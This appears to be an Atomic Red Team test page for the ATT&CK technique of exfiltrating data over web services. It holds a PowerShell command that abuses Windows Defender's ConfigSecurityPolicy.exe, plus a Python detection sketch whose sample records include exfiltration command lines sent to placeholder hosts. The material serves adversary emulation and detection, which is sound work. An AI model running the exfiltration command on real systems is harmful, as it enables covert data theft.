Exfiltration Over Web Service

Description from ATT&CK

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Atomic Tests

Atomic Test #1 - Data Exfiltration with ConfigSecurityPolicy

Exfiltration of data using ConfigSecurityPolicy.exe

Supported Platforms: windows

auto_generated_guid: 5568a8f4-a8b1-4c40-9399-4969b642f122



Attack Commands: Run with powershell!

$path = resolve-path "c:\ProgramData\Microsoft\Windows Defender\Platform\*\ConfigSecurityPolicy.exe"
& $path[0] c:\temp\config.xml ""
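A detection sketch for the behaviour in Atomic Test #1, added here as an example and not part of the Atomic Red Team test. It flags process-creation records where ConfigSecurityPolicy.exe runs with a remote URL on its command line. It assumes Sysmon Event ID 1 style field names (Image, CommandLine, ParentImage) and a destination passed as an http(s) or ftp URL; the version directory, hosts and records are constructed sample data.

```python
import ntpath
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
TARGET = "configsecuritypolicy.exe"
# Constructed paths: the version directory below is a placeholder, not a real build.
PLATFORM_DIR = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\0.0.0.0-0\\"
POWERSHELL = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": PLATFORM_DIR + "ConfigSecurityPolicy.exe",
     "CommandLine": '"' + PLATFORM_DIR + 'ConfigSecurityPolicy.exe" '
                    'c:\\temp\\config.xml "https://upload.example.test/in"',
     "ParentImage": POWERSHELL},
    {"Image": PLATFORM_DIR + "ConfigSecurityPolicy.exe",   # local file only
     "CommandLine": "ConfigSecurityPolicy.exe c:\\temp\\config.xml",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe"},
    {"Image": "C:\\Windows\\System32\\curl.exe",           # different binary
     "CommandLine": "curl.exe https://updates.example.test/pkg",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": PLATFORM_DIR + "CONFIGSECURITYPOLICY.EXE",   # case variation
     "CommandLine": "CONFIGSECURITYPOLICY.EXE c:\\temp\\config.xml HTTP://198.51.100.7/x",
     "ParentImage": POWERSHELL},
]

def find_exfil_candidates(events):
    """Return one finding per ConfigSecurityPolicy.exe launch that names a remote URL."""
    findings = []
    for ev in events:
        # ntpath parses Windows paths correctly on any analysis host.
        if ntpath.basename(ev.get("Image", "")).lower() != TARGET:
            continue
        urls = URL_RE.findall(ev.get("CommandLine", ""))
        if not urls:
            continue  # no remote destination on the command line
        findings.append({
            "image": ev["Image"],
            "parent": ntpath.basename(ev.get("ParentImage", "")),
            # Destination hosts, for comparison against the egress allowlist.
            "hosts": sorted({urlsplit(u).hostname or "" for u in urls}),
        })
    return findings

if __name__ == "__main__":
    for finding in find_exfil_candidates(SAMPLE_EVENTS):
        print(finding)
```

The parent process and destination host are returned so an analyst can separate scripted launches from anything the Defender service itself started.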